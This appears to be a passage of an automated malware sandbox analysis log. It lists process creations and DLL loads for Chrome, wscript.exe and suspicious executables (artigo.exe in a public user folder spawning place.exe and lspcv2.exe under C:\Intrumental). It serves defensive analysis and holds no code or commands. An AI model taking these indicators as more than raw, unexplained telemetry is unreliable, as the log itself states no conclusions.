Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 --field-trial-handle=1976,i,15648558303082770842,9351964472762827409,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\Public\Termos\artigo.exeProcess created: C:\Intrumental\place.exe c:\Intrumental\place.exeJump to behavior
Source: C:\Users\Public\Termos\artigo.exeProcess created: C:\Intrumental\lspcv2.exe c:\Intrumental\lspcv2.exeJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: zipfldr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: dui70.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: duser.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: chartv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: atlthunk.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: explorerframe.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: shdocvw.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\Public\Termos\artigo.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\Public\Termos\artigo.exeSection loaded: version.dllJump to behavior
Source: C:\Users\Public\Termos\artigo.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\Public\Termos\artigo.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\Public\Termos\artigo.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\Public\Termos\artigo.exeSection loaded: winsta.dllJump to behavior
Source: C:\Users\Public\Termos\artigo.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\Public\Termos\artigo.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\Public\Termos\artigo.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\Public\Termos\artigo.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\Public\Termos\artigo.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\Public\Termos\artigo.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\Public\Termos\artigo.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\Public\Termos\artigo.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\Public\Termos\artigo.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\Public\Termos\artigo.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\Public\Termos\artigo.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\Public\Termos\artigo.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\Public\Termos\artigo.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\Public\Termos\artigo.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\Public\Termos\artigo.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\Public\Termos\artigo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\Public\Termos\artigo.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\Public\Termos\artigo.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\Public\Termos\artigo.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\Public\Termos\artigo.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\Public\Termos\artigo.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\Public\Termos\artigo.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\Public\Termos\artigo.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\Public\Termos\artigo.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\Public\Termos\artigo.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\Public\Termos\artigo.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\Public\Termos\artigo.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\Public\Termos\artigo.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\Public\Termos\artigo.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\Public\Termos\artigo.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\Public\Termos\artigo.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\Public\Termos\artigo.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\Public\Termos\artigo.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\Public\Termos\artigo.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\Public\Termos\artigo.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\Public\Termos\artigo.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\Public\Termos\artigo.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\Public\Termos\artigo.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: wininet.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: version.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: winsta.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wininet.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: version.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: winsta.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: wininet.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: version.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: winsta.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Intrumental\place.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wininet.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: version.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: winsta.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wldp.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: profapi.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: netutils.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: schannel.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Intrumental\lspcv2.exeSection loaded: wsock32.dllJump to behavior
